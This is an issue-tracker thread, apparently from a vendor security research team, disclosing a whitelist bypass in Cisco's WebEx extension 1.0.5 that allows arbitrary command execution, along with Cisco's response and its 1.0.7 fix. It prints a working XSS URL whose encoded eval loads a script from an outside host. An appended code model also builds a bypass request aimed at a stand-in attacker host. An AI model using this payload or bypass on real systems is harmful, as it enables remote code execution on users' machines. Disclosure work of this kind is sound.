Issue 1100: Cisco: WebEx: New Arbitrary Command Execution in 1.0.5 via Module Whitelist Bypass

Reported by firstname.lastname@example.org (Project Member), Jan 25
In version 1.0.5 of the WebEx extension, Cisco added a GpcComponentName whitelist to prevent exploitation via XSS, preventing issue 1096. This can be defeated by putting a module signed by Cisco under GpcUrlRoot, and tricking the installation routine to overwrite one of the whitelisted modules with it. As I already have a copy of MSVCRT.DLL signed by Cisco, I used this one in my exploit.

This requires an XSS on *.webex.com, but they're unfortunately not difficult to find. Here is a working example:

https://support.webex.com/support/documentation/wwhelp/wwhimpl/common/html/frameset.htm#?");eval(atob("ZD1kb2N1bWVudDsocz1kLmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpKS5zcmM9Jy8vbG9jay5jbXB4Y2hnOGIuY29tL0pvUGhlaTdhL3dlYmV4LmpzJztkLmhlYWQuYXBwZW5kQ2hpbGQocyk7"));("

(The eval just loads this script: https://lock.cmpxchg8b.com/JoPhei7a/webex.js)

Please note that the script waits 10 seconds before running calc.exe to make sure everything is loaded.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
I made some minor changes to the exploit script.
Response: Hi Tavis, We are tracking this issue under the same ID as the previously reported issue: PSIRT-0085137008. Please include it on all communication to us regarding this vulnerability. I have also filed CSCvc88943 for our developers to investigate further. [...]
It looks like Cisco have released version 1.0.7, which adds a whitelist for the GpcExtName and GpcUnpackName properties that I was using in my exploit. It looks like they correctly handle Mac and Windows, and have also added some verification on GpcInitCall/GpcExitCall/etc so that functions have to match a RegEx. This looks like a huge improvement. Another very quick response from Cisco, I continue to be impressed with Cisco's response time. I do not currently know of any way to defeat this new patch. As the patch is public now, let's mark this fixed.

(Note: I believe the XSS is an independently discovered duplicate of CVE-2009-3731, which is already public.)

http://www.webworks.com/Security/2009-0001/
https://web.archive.org/web/20101023162802/http://www.stratsec.net/Research/Advisories/VMWare-WebWorks-XSS
Cisco's advisory is here https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170124-webex Apparently Firefox and Internet Explorer were also affected, but not on Mac or Linux. I didn't check, but have no reason to doubt Cisco's assessment.
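As an added illustration (not code from the report or from Cisco), the following is a simplified JavaScript model of the two whitelist generations described in this thread: the 1.0.5 check on GpcComponentName alone, and the 1.0.7 check that also whitelists GpcExtName/GpcUnpackName and constrains GpcInitCall/GpcExitCall with a RegEx. The property semantics, the whitelist entries and the RegEx shape are assumptions made for the model.

```javascript
// Added example, not the WebEx extension's code. Assumptions: a request
// carries the Gpc* properties named in the report, GpcExtName/GpcUnpackName
// decide which file the installer writes, and the 1.0.7 RegEx admits only
// plain identifiers. Whitelist entries are constructed placeholders.
const COMPONENT_WHITELIST = new Set(["WhitelistedComponent"]);
const FILE_WHITELIST = new Set(["whitelisted-module.dll"]);
const CALL_PATTERN = /^[A-Za-z_][A-Za-z0-9_]*$/;

// 1.0.5: only the logical component name is validated; the fields that
// decide where the fetched (Cisco-signed) module lands are not.
function accept105(req) {
  return COMPONENT_WHITELIST.has(req.GpcComponentName);
}

// 1.0.7: the file-naming fields must also be whitelisted and the entry
// points must match a strict pattern, so a whitelisted component name can
// no longer be paired with a different on-disk target or a free-form call.
function accept107(req) {
  return COMPONENT_WHITELIST.has(req.GpcComponentName)
    && FILE_WHITELIST.has(req.GpcExtName)
    && FILE_WHITELIST.has(req.GpcUnpackName)
    && CALL_PATTERN.test(req.GpcInitCall)
    && CALL_PATTERN.test(req.GpcExitCall);
}

// Constructed requests: a legitimate install, and one shaped like the
// bypass in the report (whitelisted component name, but the module it
// installs is a different signed file served from another GpcUrlRoot).
const legitimate = {
  GpcComponentName: "WhitelistedComponent",
  GpcUrlRoot: "https://vendor.invalid/modules/",
  GpcExtName: "whitelisted-module.dll",
  GpcUnpackName: "whitelisted-module.dll",
  GpcInitCall: "Init",
  GpcExitCall: "Exit",
};
const bypass = {
  ...legitimate,
  GpcUrlRoot: "https://attacker.invalid/",
  GpcExtName: "MSVCRT.DLL",
  GpcUnpackName: "MSVCRT.DLL",
};

// Returns each check's verdict on both requests.
function verdicts() {
  return {
    legit105: accept105(legitimate), legit107: accept107(legitimate),
    bypass105: accept105(bypass), bypass107: accept107(bypass),
  };
}
```

The 1.0.5 check accepts both requests, while the 1.0.7 check accepts only the legitimate one and also rejects any GpcInitCall/GpcExitCall that is not a bare identifier.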